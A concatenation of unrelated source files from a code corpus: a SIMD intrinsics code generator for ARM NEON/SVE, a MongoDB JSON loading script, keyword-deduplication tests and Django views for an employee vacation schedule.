armop = {'zip1': 'zipq', 'zip2': 'zipq', 'uzp1': 'uzpq',
'uzp2': 'uzpq'}
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }
neon_typ = '{}{}x{}x2_t'. \
format(prefix[typ[0]], typ[1:], 128 // int(typ[1:]))
if typ == 'f16':
if func in ['zip1', 'zip2']:
return '''\
nsimd_{simd_ext}_v{typ} ret;
float32x4x2_t tmp = v{op}_f32({in0}.v{i}, {in1}.v{i});
ret.v0 = tmp.val[0];
ret.v1 = tmp.val[1];
return ret;
'''.format(i = '0' if func == 'zip1' else '1',
op=armop[func], **fmtspec)
else:
return '''\
nsimd_{simd_ext}_v{typ} ret;
float32x4x2_t tmp0 = vuzpq_f32({in0}.v0, {in0}.v1);
float32x4x2_t tmp1 = vuzpq_f32({in1}.v0, {in1}.v1);
ret.v0 = tmp0.val[{i}];
ret.v1 = tmp1.val[{i}];
return ret;
'''.format(i = '0' if func == 'uzp1' else '1', **fmtspec)
elif typ in ['i64', 'u64']:
return '''\
{typ} buf0[2], buf1[2];
{typ} ret[2];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
ret[0] = buf0[{i}];
ret[1] = buf1[{i}];
return vld1q_{suf}(ret);'''. \
format(**fmtspec, i= '0' if func in ['zip1', 'uzp1'] else '1')
elif typ == 'f64' :
return '''\
nsimd_{simd_ext}_v{typ} ret;
ret.v0 = {in0}.v{i};
ret.v1 = {in1}.v{i};
return ret;'''. \
format(**fmtspec, i= '0' if func in ['zip1', 'uzp1'] else '1')
else :
return '''\
{neon_typ} res;
res = v{op}_{suf}({in0}, {in1});
return res.val[{i}];'''. \
format(neon_typ=neon_typ, op=armop[func], **fmtspec,
i = '0' if func in ['zip1', 'uzp1'] else '1')
def zip_unzip(func, simd_ext, typ):
lo_hi = '''\
nsimd_{simd_ext}_v{typ}x2 ret;
ret.v0 = nsimd_{func}lo_{simd_ext}_{typ}({in0}, {in1});
ret.v1 = nsimd_{func}hi_{simd_ext}_{typ}({in0}, {in1});
return ret;
'''.format(func='zip' if func == 'zip' else 'unzip', **fmtspec)
if simd_ext == 'aarch64' or simd_ext in sve:
content = '''\
nsimd_{simd_ext}_v{typ}x2 ret;
ret.v0 = {s}v{func}1{q}_{suf}({in0}, {in1});
ret.v1 = {s}v{func}2{q}_{suf}({in0}, {in1});
return ret;'''.format(s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q',
func=func, **fmtspec)
if typ == 'f16':
return '''\
#ifdef NSIMD_ARM_FP16
{c}
#else
{default}
#endif'''.\
format(c=content, default=lo_hi, s = 's' if simd_ext in sve else '',
**fmtspec)
else:
return content
else:
prefix = { 'i': 'int', 'u': 'uint', 'f': 'float' }
neon_typ = '{}{}x{}x2_t'.\
format(prefix[typ[0]], typ[1:], 128 // int(typ[1:]))
content = '''\
nsimd_{simd_ext}_v{typ}x2 ret;
{neon_typ} tmp = v{func}q_{suf}({in0}, {in1});
ret.v0 = tmp.val[0];
ret.v1 = tmp.val[1];
return ret;'''\
.format(func=func, neon_typ=neon_typ, **fmtspec)
if typ in ['u64', 'i64', 'f64']:
return lo_hi
elif typ == 'f16':
return '''\
#ifdef NSIMD_ARM_FP16
{content}
#else
{default}
#endif'''.\
format(content=content, default=lo_hi,
f='zip' if func == 'zip' else 'unzip', **fmtspec)
else:
return content
# -----------------------------------------------------------------------------
# gather
def gather(simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
emul = '''int i;
{typ} buf[{le}];
i{typnbits} offset_buf[{le}];
svst1_s{typnbits}({svtrue}, offset_buf, {in1});
for (i = 0; i < {real_le}; i++) {{
buf[i] = {in0}[offset_buf[i]];
}}
return svld1_{suf}({svtrue}, buf);'''. \
format(le=le, real_le=real_le, **fmtspec)
else:
emul = \
'''nsimd_{simd_ext}_v{typ} ret;
ret = vdupq_n_{suf}({in0}[vgetq_lane_s{typnbits}({in1}, 0)]);'''. \
format(**fmtspec) + ''.join([
'''ret = vsetq_lane_{suf}({in0}[
vgetq_lane_s{typnbits}({in1}, {i})], ret, {i});\n'''. \
format(i=i, **fmtspec) for i in range(1, le)]) + \
'return ret;'
if typ == 'f16':
if simd_ext in sve:
return emul
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
nsimd_{simd_ext}_vf16 ret;
f32 buf[8];
'''.format(emul=emul, **fmtspec) + \
''.join(['buf[{i}] = nsimd_f16_to_f32({in0}[' \
'vgetq_lane_s16({in1}, {i})]);\n'. \
format(i=i, **fmtspec) for i in range(4)]) + \
''.join(['buf[4 + {i}] = nsimd_f16_to_f32({in0}[' \
'vgetq_lane_s16({in1}, 4 + {i})]);\n'. \
format(i=i, **fmtspec) for i in range(4)]) + \
''' ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''.format(**fmtspec)
if simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
i64 offset_buf[2];
vst1q_s64(offset_buf, {in1});
ret.v0 = {in0}[offset_buf[0]];
ret.v1 = {in0}[offset_buf[1]];
return ret;'''.format(**fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
return 'return svld1_gather_s{typnbits}index_{suf}({svtrue}, {in0}, ' \
'{in1});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# linear gather
def gather_linear(simd_ext, typ):
if simd_ext in sve:
if typ in ['i8', 'u8', 'i16', 'u16', 'f16']:
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
return '''{typ} buf[{le}];
int i;
for (i = 0; i < {real_le}; i++) {{
buf[i] = {in0}[i * {in1}];
}}
return svld1_{suf}({svtrue}, buf);'''. \
format(le=le, real_le=real_le, **fmtspec)
else:
return 'return svld1_gather_s{typnbits}index_{suf}({svtrue}, ' \
'{in0}, svindex_s{typnbits}(0, (i{typnbits}){in1}));'. \
format(**fmtspec)
# getting here means neon128 and aarch64
intrinsic = '''nsimd_{simd_ext}_v{typ} ret;
ret = vdupq_n_{suf}({in0}[0]);
'''.format(**fmtspec) + ''.join([
'ret = vsetq_lane_{suf}({in0}[{i} * {in1}], ret, {i});\n'. \
format(i=i, **fmtspec) \
for i in range(1, 128 // int(fmtspec['typnbits']))]) + \
'''return ret;'''
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{intrinsic}
#else
nsimd_{simd_ext}_vf16 ret;
f32 buf[8];
int i;
for (i = 0; i < 8; i++) {{
buf[i] = nsimd_f16_to_f32({in0}[i * {in1}]);
}}
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''.format(intrinsic=intrinsic, **fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0}[0];
ret.v1 = {in0}[{in1}];
return ret;'''.format(**fmtspec)
return intrinsic
# -----------------------------------------------------------------------------
# masked gather
def maskoz_gather(oz, simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
utyp = 'u{typnbits}'.format(**fmtspec)
store = '''svst1_s{typnbits}({svtrue}, offset_buf, {in2});
svst1_{utyp}({svtrue}, mask, svsel_{utyp}(
{in0}, svdup_n_{utyp}(({utyp})-1), svdup_n_{utyp}(
({utyp})0)));
'''.format(utyp=utyp, **fmtspec)
if oz == 'z':
store += 'svst1_{suf}({svtrue}, buf, svdup_n_{suf}(({typ})0));'. \
format(**fmtspec)
else:
store += 'svst1_{suf}({svtrue}, buf, {in3});'.format(**fmtspec)
load = 'svld1_{suf}({svtrue}, buf)'.format(**fmtspec)
else:
store = '''vst1q_s{typnbits}(offset_buf, {in2});
vst1q_u{typnbits}(mask, {in0});'''.format(**fmtspec)
if oz == 'z':
store += 'vst1q_{suf}(buf, vdupq_n_{suf}(({typ})0));'. \
format(**fmtspec)
else:
store += 'vst1q_{suf}(buf, {in3});'.format(**fmtspec)
load = 'vld1q_{suf}(buf)'.format(**fmtspec)
emul = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
i{typnbits} offset_buf[{le}];
{store}
for (i = 0; i < {real_le}; i++) {{
if (mask[i]) {{
buf[i] = {in1}[offset_buf[i]];
}}
}}
return {load};'''. \
format(le=le, real_le=real_le, store=store, load=load, **fmtspec)
if typ == 'f16':
if simd_ext in sve:
return emul
if oz == 'z':
oz0 = 'vdupq_n_f32(0.0f)'
oz1 = oz0
else:
oz0 = '{in3}.v0'.format(**fmtspec)
oz1 = '{in3}.v1'.format(**fmtspec)
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
nsimd_{simd_ext}_vf16 ret;
int i;
f32 buf[{le}];
u32 mask[{le}];
i16 offset_buf[{le}];
vst1q_s16(offset_buf, {in2});
vst1q_f32(buf, {oz0});
vst1q_f32(buf + {leo2}, {oz1});
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + {leo2}, {in0}.v1);
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
buf[i] = nsimd_f16_to_f32({in1}[offset_buf[i]]);
}}
}}
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + {leo2});
return ret;
#endif'''.format(emul=emul, leo2=le // 2, le=le, oz0=oz0,
oz1=oz1, **fmtspec)
if simd_ext == 'neon128' and typ == 'f64':
oz0 = '0.0' if oz == 'z' else '{in3}.v0'.format(**fmtspec)
oz1 = '0.0' if oz == 'z' else '{in3}.v1'.format(**fmtspec)
return '''nsimd_neon128_vf64 ret;
i64 offset_buf[2];
vst1q_s64(offset_buf, {in2});
if ({in0}.v0) {{
ret.v0 = {in1}[offset_buf[0]];
}} else {{
ret.v0 = {oz0};
}}
if ({in0}.v1) {{
ret.v1 = {in1}[offset_buf[1]];
}} else {{
ret.v1 = {oz1};
}}
return ret;'''.format(oz0=oz0, oz1=oz1, **fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
oz0 = 'svdup_n_{suf}(({typ})0)'.format(**fmtspec) if oz == 'z' \
else '{in3}'.format(**fmtspec)
return '''return svsel_{suf}({in0}, svld1_gather_s{typnbits}index_{suf}(
{in0}, {in1}, {in2}), {oz0});'''. \
format(oz0=oz0, **fmtspec)
# -----------------------------------------------------------------------------
# scatter
def scatter(simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
emul = '''int i;
{typ} buf[{le}];
i{typnbits} offset_buf[{le}];
svst1_s{typnbits}({svtrue}, offset_buf, {in1});
svst1_{suf}({svtrue}, buf, {in2});
for (i = 0; i < {real_le}; i++) {{
{in0}[offset_buf[i]] = buf[i];
}}'''.format(le=le, real_le=real_le, **fmtspec)
else:
emul = '\n'.join(['{in0}[vgetq_lane_s{typnbits}({in1}, {i})] = ' \
'vgetq_lane_{suf}({in2}, {i});\n'. \
format(i=i, **fmtspec) for i in range(int(le))])
if typ == 'f16':
if simd_ext in sve:
return emul
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
'''.format(emul=emul) + \
'\n'.join(['{in0}[vgetq_lane_s16({in1}, {i})] = ' \
'nsimd_f32_to_f16(vgetq_lane_f32({in2}.v0, '
'{i}));\n'.format(i=i, **fmtspec) \
for i in range(4)]) + \
'\n'.join(['{in0}[vgetq_lane_s16({in1}, 4 + {i})] = ' \
'nsimd_f32_to_f16(vgetq_lane_f32({in2}.v1, '
'{i}));\n'.format(i=i, **fmtspec) \
for i in range(4)]) + \
'''
#endif'''
if simd_ext == 'neon128' and typ == 'f64':
return '''i64 offset_buf[2];
vst1q_s64(offset_buf, {in1});
{in0}[offset_buf[0]] = {in2}.v0;
{in0}[offset_buf[1]] = {in2}.v1;'''.format(**fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
return 'svst1_scatter_s{typnbits}index_{suf}({svtrue}, {in0}, ' \
'{in1}, {in2});'.format(le=le, **fmtspec)
# -----------------------------------------------------------------------------
# linear scatter
def scatter_linear(simd_ext, typ):
if simd_ext in sve:
if typ in ['i8', 'u8', 'i16', 'u16', 'f16']:
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
return '''{typ} buf[{le}];
int i;
svst1_{suf}({svtrue}, buf, {in2});
for (i = 0; i < {real_le}; i++) {{
{in0}[i * {in1}] = buf[i];
}}'''.format(le=le, real_le=real_le, **fmtspec)
else:
return 'svst1_scatter_s{typnbits}index_{suf}({svtrue}, {in0}, ' \
'svindex_s{typnbits}(0, (i{typnbits}){in1}), {in2});'. \
format(**fmtspec)
# getting here means neon128 and aarch64
intrinsic = '\n'.join([
'{in0}[{i} * {in1}] = vgetq_lane_{suf}({in2}, {i});'. \
format(i=i, **fmtspec) for i in range(128 // int(fmtspec['typnbits']))])
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{intrinsic}
#else
f32 buf[8];
int i;
vst1q_f32(buf, {in2}.v0);
vst1q_f32(buf + 4, {in2}.v1);
for (i = 0; i < 8; i++) {{
{in0}[i * {in1}] = nsimd_f32_to_f16(buf[i]);
}}
#endif'''.format(intrinsic=intrinsic, **fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''{in0}[0] = {in2}.v0;
{in0}[{in1}] = {in2}.v1;'''.format(**fmtspec)
return intrinsic
# -----------------------------------------------------------------------------
# mask_scatter
def mask_scatter(simd_ext, typ):
le = max_len(simd_ext, typ)
real_le = real_len(simd_ext, typ)
if simd_ext in sve:
store = '''svst1_s{typnbits}({svtrue}, offset_buf, {in2});
svst1_u{typnbits}({svtrue}, mask, svsel_u{typnbits}(
{in0}, svdup_n_u{typnbits}((u{typnbits})1),
svdup_n_u{typnbits}((u{typnbits})0)));
svst1_{suf}({svtrue}, buf, {in3});'''.format(**fmtspec)
else:
store = '''vst1q_s{typnbits}(offset_buf, {in2});
vst1q_{suf}(buf, {in3});
vst1q_u{typnbits}(mask, {in0});'''.format(**fmtspec)
emul = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
i{typnbits} offset_buf[{le}];
{store}
for (i = 0; i < {real_le}; i++) {{
if (mask[i]) {{
{in1}[offset_buf[i]] = buf[i];
}}
}}'''.format(le=le, real_le=real_le, store=store, **fmtspec)
if typ == 'f16':
if simd_ext in sve:
return emul
return '''#ifdef NSIMD_ARM_FP16
{emul}
#else
int i;
f32 buf[{le}];
u32 mask[{le}];
i16 offset_buf[{le}];
vst1q_s16(offset_buf, {in2});
vst1q_f32(buf, {in3}.v0);
vst1q_f32(buf + {leo2}, {in3}.v1);
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + {leo2}, {in0}.v1);
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
{in1}[offset_buf[i]] = nsimd_f32_to_f16(buf[i]);
}}
}}
#endif'''.format(emul=emul, le=le, leo2=le // 2, **fmtspec)
if simd_ext == 'neon128' and typ == 'f64':
return '''i64 offset_buf[2];
vst1q_s64(offset_buf, {in2});
if ({in0}.v0) {{
{in1}[offset_buf[0]] = {in3}.v0;
}}
if ({in0}.v1) {{
{in1}[offset_buf[1]] = {in3}.v1;
}}'''.format(**fmtspec)
if simd_ext in neon or typ in ['i8', 'u8', 'i16', 'u16']:
return emul
# getting here means SVE
return 'svst1_scatter_s{typnbits}index_{suf}({in0}, {in1}, ' \
'{in2}, {in3});'.format(le=le, **fmtspec)
# -----------------------------------------------------------------------------
# get_impl function
def get_impl(opts, func, simd_ext, from_typ, to_typ):
global fmtspec
simd_ext2 = simd_ext if not simd_ext in fixed_sized_sve else 'sve'
fmtspec = {
'simd_ext': simd_ext,
'simd_ext2': simd_ext2,
'typ': from_typ,
'from_typ': from_typ,
'to_typ': to_typ,
'suf': suf(from_typ),
'in0': common.in0,
'in1': common.in1,
'in2': common.in2,
'in3': common.in3,
'in4': common.in4,
'in5': common.in5,
'typnbits': from_typ[1:],
'svtrue': 'svptrue_b{}()'.format(from_typ[1:]),
'svetyp': sve_typ(from_typ),
}
impls = {
'loada': lambda: load1234(opts, simd_ext, from_typ, 1),
'masko_loada1': lambda: maskoz_load('o', simd_ext, from_typ),
'maskz_loada1': lambda: maskoz_load('z', simd_ext, from_typ),
'load2a': lambda: load1234(opts, simd_ext, from_typ, 2),
'load3a': lambda: load1234(opts, simd_ext, from_typ, 3),
'load4a': lambda: load1234(opts, simd_ext, from_typ, 4),
'loadu': lambda: load1234(opts, simd_ext, from_typ, 1),
'masko_loadu1': lambda: maskoz_load('o', simd_ext, from_typ),
'maskz_loadu1': lambda: maskoz_load('z', simd_ext, from_typ),
'load2u': lambda: load1234(opts, simd_ext, from_typ, 2),
'load3u': lambda: load1234(opts, simd_ext, from_typ, 3),
'load4u': lambda: load1234(opts, simd_ext, from_typ, 4),
'storea': lambda: store1234(opts, simd_ext, from_typ, 1),
'mask_storea1': lambda: mask_store(simd_ext, from_typ),
'store2a': lambda: store1234(opts, simd_ext, from_typ, 2),
'store3a': lambda: store1234(opts, simd_ext, from_typ, 3),
'store4a': lambda: store1234(opts, simd_ext, from_typ, 4),
'storeu': lambda: store1234(opts, simd_ext, from_typ, 1),
'mask_storeu1': lambda: mask_store(simd_ext, from_typ),
'store2u': lambda: store1234(opts, simd_ext, from_typ, 2),
'store3u': lambda: store1234(opts, simd_ext, from_typ, 3),
'store4u': lambda: store1234(opts, simd_ext, from_typ, 4),
'gather': lambda: gather(simd_ext, from_typ),
'gather_linear': lambda: gather_linear(simd_ext, from_typ),
'maskz_gather': lambda: maskoz_gather('z', simd_ext, from_typ),
'masko_gather': lambda: maskoz_gather('o', simd_ext, from_typ),
'scatter': lambda: scatter(simd_ext, from_typ),
'scatter_linear': lambda: scatter_linear(simd_ext, from_typ),
'mask_scatter': lambda: mask_scatter(simd_ext, from_typ),
'andb': lambda: binop2("andb", simd_ext2, from_typ),
'xorb': lambda: binop2("xorb", simd_ext2, from_typ),
'orb': lambda: binop2("orb", simd_ext2, from_typ),
'andl': lambda: lop2(opts, "andl", simd_ext2, from_typ),
'xorl': lambda: lop2(opts, "xorl", simd_ext2, from_typ),
'orl': lambda: lop2(opts, "orl", simd_ext2, from_typ),
'notb': lambda: not1(simd_ext2, from_typ),
'notl': lambda: lnot1(opts, simd_ext2, from_typ),
'andnotb': lambda: binop2("andnotb", simd_ext2, from_typ),
'andnotl': lambda: lop2(opts, "andnotl", simd_ext2, from_typ),
'add': lambda: addsub("add", simd_ext2, from_typ),
'sub': lambda: addsub("sub", simd_ext2, from_typ),
'adds': lambda: adds(simd_ext2, from_typ),
'subs': lambda: subs(simd_ext2, from_typ),
'div': lambda: div2(simd_ext2, from_typ),
'sqrt': lambda: sqrt1(simd_ext2, from_typ),
'len': lambda: len1(simd_ext, from_typ),
'mul': lambda: mul2(simd_ext2, from_typ),
'shl': lambda: shl_shr("shl", simd_ext2, from_typ),
'shr': lambda: shl_shr("shr", simd_ext2, from_typ),
'shra': lambda: shra(simd_ext2, from_typ),
'set1': lambda: set1(simd_ext2, from_typ),
'set1l': lambda: lset1(simd_ext2, from_typ),
'eq': lambda: cmp2(opts, "eq", simd_ext2, from_typ),
'lt': lambda: cmp2(opts, "lt", simd_ext2, from_typ),
'le': lambda: cmp2(opts, "le", simd_ext2, from_typ),
'gt': lambda: cmp2(opts, "gt", simd_ext2, from_typ),
'ge': lambda: cmp2(opts, "ge", simd_ext2, from_typ),
'ne': lambda: neq2(opts, simd_ext2, from_typ),
'if_else1': lambda: if_else3(opts, simd_ext2, from_typ),
'min': lambda: minmax2("min", simd_ext2, from_typ),
'max': lambda: minmax2("max", simd_ext2, from_typ),
'loadla': lambda: loadl(True, simd_ext2, from_typ),
'loadlu': lambda: loadl(False, simd_ext2, from_typ),
'storela': lambda: storel(True, simd_ext2, from_typ),
'storelu': lambda: storel(False, simd_ext2, from_typ),
'abs': lambda: abs1(simd_ext2, from_typ),
'fma': lambda: fmafnma3("fma", simd_ext2, from_typ),
'fnma': lambda: fmafnma3("fnma", simd_ext2, from_typ),
'fms': lambda: fmsfnms3("fms", simd_ext2, from_typ),
'fnms': lambda: fmsfnms3("fnms", simd_ext2, from_typ),
'ceil': lambda: round1("ceil", simd_ext2, from_typ),
'floor': lambda: round1("floor", simd_ext2, from_typ),
'trunc': lambda: round1("trunc", simd_ext2, from_typ),
'round_to_even': lambda: round1("round_to_even", simd_ext2, from_typ),
'all': lambda: allany1(opts, "all", simd_ext2, from_typ),
'any': lambda: allany1(opts, "any", simd_ext2, from_typ),
'reinterpret': lambda: reinterpret1(simd_ext2, from_typ, to_typ),
'reinterpretl': lambda: reinterpretl1(simd_ext2, from_typ, to_typ),
'cvt': lambda: convert1(simd_ext2, from_typ, to_typ),
'rec11': lambda: recs1("rec11", simd_ext2, from_typ),
'rec8': lambda: recs1("rec8", simd_ext2, from_typ),
'rsqrt11': lambda: recs1("rsqrt11", simd_ext2, from_typ),
'rsqrt8': lambda: recs1("rsqrt8", simd_ext2, from_typ),
'rec': lambda: recs1("rec", simd_ext2, from_typ),
'neg': lambda: neg1(simd_ext2, from_typ),
'nbtrue': lambda: nbtrue1(opts, simd_ext2, from_typ),
'reverse': lambda: reverse1(simd_ext2, from_typ),
'addv': lambda: addv(simd_ext2, from_typ),
'upcvt': lambda: upcvt1(simd_ext2, from_typ, to_typ),
'downcvt': lambda: downcvt1(simd_ext2, from_typ, to_typ),
'to_logical': lambda: to_logical1(opts, simd_ext2, from_typ),
'to_mask': lambda: to_mask1(opts, simd_ext2, from_typ),
'ziplo': lambda: zip_unzip_half("zip1", simd_ext2, from_typ),
'ziphi': lambda: zip_unzip_half("zip2", simd_ext2, from_typ),
'unziplo': lambda: zip_unzip_half("uzp1", simd_ext2, from_typ),
'unziphi': lambda: zip_unzip_half("uzp2", simd_ext2, from_typ),
'zip' : lambda: zip_unzip("zip", simd_ext2, from_typ),
'unzip' : lambda: zip_unzip("uzp", simd_ext2, from_typ),
'mask_for_loop_tail': lambda : mask_for_loop_tail(simd_ext, from_typ),
'iota': lambda : iota(simd_ext2, from_typ)
}
if simd_ext not in get_simd_exts():
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
if not from_typ in common.types:
raise ValueError('Unknown type "{}"'.format(from_typ))
if not func in impls:
return common.NOT_IMPLEMENTED
else:
return impls[func]()
| 1.648438
| 2
|
db_dump/etender2mongoscripts/dumptenderitems.py
|
EBRD-MoldovaOpenContracting/Moldova-Data-Load
| 4
|
12783491
|
import pymongo
import os
import json
import myconfig
dbEtenders = myconfig.getMongoDb()
tender_items_collection = dbEtenders.tender_items_collection
tender_items_collection.remove({})
def dumpJsonFileToDatabase(jsonfile, collection):
if(os.path.isfile(jsonfile)):
with open(jsonfile) as _file:
data = json.load(_file)
count = 0
while(count < len(data["rows"])):
collection.insert_one(data["rows"][count])
count += 1
def dumpAllJsonFiles(jsonfolder, collection):
print "dumping json from " + jsonfolder
for jsonfile in os.listdir(jsonfolder):
if os.path.isfile(jsonfolder + os.sep + jsonfile):
dumpJsonFileToDatabase(jsonfolder + os.sep + jsonfile, collection)
dumpAllJsonFiles(os.path.join(myconfig.jsonfolder,"tenderitems"), tender_items_collection)
| 2.9375
| 3
|
main.py
|
Forward-UIUC-2021F/haoxiang-sun-keyword-deduplication
| 0
|
12783492
|
from phrase_similarity import dedup_by_embedding, dedup_by_stemming
# Test1
result1 = dedup_by_stemming(['civilization', 'civil', 'computer'])
sol1 = ['civilization', 'computer']
if result1 == sol1:
print("Test 1 Passed")
else:
print("Test 1 Failed")
print(result1)
exit()
#Test 2
result2 = dedup_by_embedding(["database technique", "database techniques",
"cloud network", "cloud networks",
"machine learning",
"supervised learning",
"un supervised learning",
"data mining",
"data mining technique", "data mining techniques"])
sol2 = ['database technique',
'cloud network',
'machine learning',
'supervised learning',
'un supervised learning',
'data mining',
'data mining technique'
]
if result2 == sol2:
print("Test 2 Passed")
else:
print("Test 2 Failed")
print(result2)
exit()
#Test 3
result3 = dedup_by_embedding(["Linear Neural network",
"Convolutional Neural Network",
"Database system", "Database systems", "database system",
"data mining techniques", "Data mining methods",
"programming language", "program languages",
"cloud storage",
"cloud network", "cloud networks"])
sol3 = ['linear neural network',
'convolutional neural network',
'database system',
'data mining techniques',
'programming language',
'cloud storage',
'cloud network']
if result3 == sol3:
print("Test 3 Passed")
else:
print("Test 3 Failed")
print(result3)
exit()
#Test 4
result4 = dedup_by_embedding(["machine learning", "machine-learning", "machine learn",
"machine translation",
"machine translation system",
"machine translation evaluation",
"machine vision",
"machine vision system",
"machine vision application",
"machine intelligence", "machine consciousness", "machine perception",
"machine learning algorithm", "machine learning algorithms", "machine learn algorithm",
"machine learning techniques", "machine learning technique", "machine learn technique",
"machine learn method", "machine learning methods", "machine learning method",
"machine learning approach", "machine learn approach",
"machine learning classifiers", "machine learning classifier",
"machine-type communications", "machine type communications",
"machine-type communication", "machine type communication",
"machine structure", "machine structures"
])
sol4 = ['machine learning',
'machine translation',
'machine translation system',
'machine translation evaluation',
'machine vision',
'machine vision system',
'machine vision application',
'machine consciousness',
'machine learning algorithm',
'machine learning techniques',
'machine learning approach',
'machine learning classifiers',
'machine type communications',
'machine structure']
if result4 == sol4:
print("Test 4 Passed")
else:
print("Test 4 Failed")
print(result4)
exit()
#Test 5
result5 = dedup_by_embedding([
"data mining",
"data mining algorithm", "data mining technique",
"data structure", "data structures",
"database design",
"data stream", "data streams",
"database", "databases",
"data analysis", "data analytics",
"big data analytics",
"data visualization",
"database system",
"data privacy", "data security",
"image database",
"graph database",
])
sol5 = ['data mining',
'data mining algorithm',
'data mining technique',
'data structure',
'database design',
'data stream',
'database',
'data analysis',
'big data analytics',
'data visualization',
'database system',
'data privacy',
'image database',
'graph database']
if result5 == sol5:
print("Test 5 Passed")
else:
print("Test 5 Failed")
print(result5)
exit()
#Test 6
result6 = dedup_by_embedding(["helloworld", "world", "network"])
sol6 = ["helloworld", "world", "network"]
if result6 == sol6:
print("Test 6 Passed")
else:
print("Test 6 Failed")
print(result6)
exit()
| 3.203125
| 3
|
employee_portal/vacation_schedule/views.py
|
Dmitriy200123/employee_portal
| 0
|
12783493
|
import xlwt
from django.shortcuts import get_object_or_404, HttpResponse
from django.urls import reverse_lazy
from django.utils.datetime_safe import datetime
from django.views.generic import DetailView, ListView, UpdateView, DeleteView, TemplateView
# Create your views here.
from employee_information_site.models import Employee
from vacation_schedule.forms import VacationPeriodForm
from vacation_schedule.models import EmployeeVacationPeriod, DaysRemainder
class VacationListPage(ListView):
template_name = 'vacation_schedule/vacation_list_page.html'
model = EmployeeVacationPeriod
context_object_name = 'vacation_periods'
def get_queryset(self):
queryset = super().get_queryset()
employee = Employee.objects.filter(user=self.request.user.id).first()
current_year = datetime.now().year
return queryset.filter(employeeId=employee.id, startDateVacation__year=current_year)
def get_context_data(self, **kwargs):
context = super(VacationListPage, self).get_context_data(**kwargs)
employee = Employee.objects.filter(user=self.request.user.id).first()
context['current_user'] = employee
context['days_remainder'] = DaysRemainder.objects.filter(employee=employee).first()
return context
class UpdateOrCreateVacationPeriod(UpdateView):
model = EmployeeVacationPeriod
form_class = VacationPeriodForm
template_name = 'vacation_schedule/add_vacation_page.html'
success_url = reverse_lazy('vacation_schedule:vacationListPage')
context_object_name = 'vacation_period'
def get_object(self, **kwargs):
vacation_id = self.kwargs.get('id')
return self.model.objects.filter(id=vacation_id).first()
def form_invalid(self, form):
return self.form_validate(form)
def form_valid(self, form):
return self.form_validate(form)
def form_validate(self, form):
if not form.errors.get('employeeId') is None:
form.errors.pop('employeeId')
if not form.errors.get('vacationDays') is None:
form.errors.pop('vacationDays')
employee = Employee.objects.filter(user=self.request.user.id).first()
days_remainder = DaysRemainder.objects.filter(employee=employee).first()
if form.instance.vacationDays:
days_remainder.remainder += form.instance.vacationDays
form.instance.employeeId = employee
form.instance.vacationDays = (form.instance.endDateVacation - form.instance.startDateVacation).days
self.validate_date(form, days_remainder)
if form.is_valid():
days_remainder.remainder -= form.instance.vacationDays
days_remainder.save()
return super().form_valid(form)
return super().form_invalid(form)
def validate_date(self, form, days_remainder):
if form.instance.vacationDays <= 0:
form.add_error('endDateVacation', 'Неправильно выбрана дата окончания отпуска')
if form.instance.vacationDays > days_remainder.remainder:
form.add_error('vacationDays', 'Выбрано больше дней, чем осталось')
vacation_periods = self.model.objects.filter(employeeId=days_remainder.employee)
if vacation_periods:
if any(x for x in vacation_periods if self.check_date_intersection(form, x)):
form.add_error('startDateVacation',
'Период отпуска пересекается с предыдущими периодамами')
def get_context_data(self, **kwargs):
context = super(UpdateOrCreateVacationPeriod, self).get_context_data(**kwargs)
current_user = Employee.objects.filter(user=self.request.user.id).first()
context['current_user'] = current_user
return context
@staticmethod
def check_date_intersection(form, vacation_period):
return form.instance.id != vacation_period.id and (
vacation_period.startDateVacation <= form.instance.startDateVacation <= vacation_period.endDateVacation
or vacation_period.startDateVacation <= form.instance.endDateVacation <= vacation_period.endDateVacation
or form.instance.startDateVacation <= vacation_period.startDateVacation <= form.instance.endDateVacation
or form.instance.startDateVacation <= vacation_period.endDateVacation <= form.instance.endDateVacation)
class DeleteVacationPeriod(DeleteView):
model = EmployeeVacationPeriod
success_url = reverse_lazy('vacation_schedule:vacationListPage')
context_object_name = 'period'
def get_object(self, **kwargs):
vacation_id = self.kwargs.get('id')
return get_object_or_404(self.model, id=vacation_id)
def delete(self, request, *args, **kwargs):
vacation_period = self.get_object(**kwargs)
days_remainder = DaysRemainder.objects.filter(employee=vacation_period.employeeId).first()
days_remainder.remainder += vacation_period.vacationDays
if days_remainder.remainder > days_remainder.maxCountDays.maxCountDays:
days_remainder.remainder = days_remainder.maxCountDays.maxCountDays
days_remainder.save()
